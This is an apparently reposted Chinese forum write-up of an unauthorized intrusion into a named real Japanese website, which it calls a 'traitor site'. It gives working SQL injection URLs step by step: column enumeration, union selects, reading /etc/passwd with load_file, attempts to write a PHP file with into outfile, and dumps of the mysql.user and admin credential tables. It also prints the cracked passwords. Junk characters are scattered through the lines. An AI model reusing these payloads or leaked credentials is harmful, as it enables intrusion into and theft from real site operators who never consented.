原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0x01. 检测 www.zuaa.jp 收集数据
6 ^5 c- e& v" o
! z3 s* K* d" X/ h1 F9 J2 Y
9 T$ ]( Z" F! y& z3 f" m# Y. Lwhatweb
1 Z, u( M$ T! p6 [/ j

利用NMAP扫描

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


0x03.order by
& ]' M4 S. T5 n5 s$ ]) q" D             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
! G) {$ b: M$ M: [/ [
& g" \9 j: ^0 i+ x. E6 u; eorder by 28报错，order by 27正常
7 {5 g( o6 Z, [! ~2 U$ H/ R5 `0 v
0x04.   union手动查询
: k8 N# z; \) {. I: dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
7 v7 z* g, ?8 I添加到 27 时正常显示

) v% e' N% Q* O* I& @9 ]中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

, h( B2 l- M8 f; \! R0x05. info:
" c) f" I# l0 Q  Ehttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( H2 p$ _  Z# [( F
3 p' m  S& ]) \2 T2 n. e9 v; ~* Suser:            root@localhost
database:    openpne
3 P6 ~' `& o* P+ j, E4 Pversion:      4.1.22
os:             portbld-freebsd5.4
4 J1 |# k, o' J! n) Q
0x06. root用户
7 ^& _5 p* Y0 n8 |% i利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
3 E" H8 P% X2 t- C4 ]
! P, \$ r5 n% r+ z( G# n通过工具转换
: Q2 s1 y2 s0 b) C
1 d! g2 `$ j& l/ Y) S1 h中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
* V" c' a" P+ q
4 t5 l$ o# ~: k+ G9 b0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

1 ~& K: z1 J+ }http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
2 \# v% l6 [* ^
0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
9 N' m0 T; j* I: V" u中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持


" [6 X# n% a: ~/ @- B
3 ?6 [$ T" C  ?5 e0x09. 查找后台
0 O* X" r3 ^2 l/ Y. `1 h3 T利用 现有的各种 后台工具尝试都不行
6 r1 W) \( F$ P" `" Z) J2 m: J
0x10.  MySL外联方法
/ s( ~* q, p6 Z2 U5 s从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
7 `3 _" `1 j! j; W7 {可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
# \( D* m- u( p" g! o6 {
/ m" T5 \8 l6 U/ e, l% s这个可以在 www.cmd5.com 解密
) o+ k' y" O, b0 {3 L4 p0 f; x9 [root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
. H7 G* N% q& O, ~& S& ?( Wopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
! ^2 _9 d$ d6 I; H# ?" S8 d" M工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

. a# M8 g2 u9 e. R. X1 h
0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码


) W% M0 D: H( @( `0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login
" ^" U2 m: z  H& o/ [: p
7 \0 d& }2 D# c1 V表名 (c_admin_user) ，字段名（username,password）
& b9 w- P7 N6 U  T) phttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
* V0 j! x" ~- L  n  J. v8 h; x
4 t, l9 |1 }9 W# J# g" i中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台
4 O1 ~/ P! N  m
6 o5 ]0 Q, O5 F- c: `

0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
4 P6 }# i* S' V中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
. G2 ~  V' Z1 A2 u/ T
, z* P1 p# A; ]1 j, k1 @7 ~最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
/ c( T' N$ n& ]: ]' n' g6 d

荒村狂客

哪个牛人 费的这劲 入侵的